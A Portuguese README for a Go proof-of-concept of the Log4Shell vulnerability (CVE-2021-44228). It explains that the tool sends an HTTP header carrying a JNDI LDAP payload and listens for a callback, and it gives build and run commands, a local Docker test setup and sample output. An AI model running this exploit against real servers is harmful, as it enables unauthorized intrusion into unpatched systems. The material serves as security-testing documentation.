
Um simples PoC Log4j escrito em Go
⚠️ Aviso:
Esta ferramenta destina-se apenas a fins educacionais, pesquisa de segurança e ambientes de teste controlados.
Usá-la contra sistemas sem permissão explícita é ilegal e de total responsabilidade do utilizador.
Este projeto contém um Proof-of-Concept (PoC) simples para a vulnerabilidade Apache Log4j2 (CVE-2021-44228).
O PoC envia um cabeçalho HTTP especialmente criado com um payload JNDI LDAP para o alvo.
Se o alvo for vulnerável, enviará um callback para o endereço LHOST especificado.
go build -o exploit exploit.go
sudo ./exploit -r "http://<TARGET_URL>/?search=test" -l <LOCAL_IP>
-r → URL do alvo (endpoint da aplicação vulnerável)-l → Endereço IP do seu listener de callback (a máquina a executar o PoC)Usando a aplicação vulnerável Docker fornecida:
# Executar a app vulnerável
docker run --rm --network host ghcr.io/christophetd/log4shell-vulnerable-app
# Executar o exploit
sudo ./exploit -r "http://127.0.0.1:8080/?search=test" -l 127.0.0.1
Saída esperada:
[*] Callback started on 1389
[*] Payload sent! HTTP Status: 200
[*] Callback from 127.0.0.1:56789, target is VULNERABLE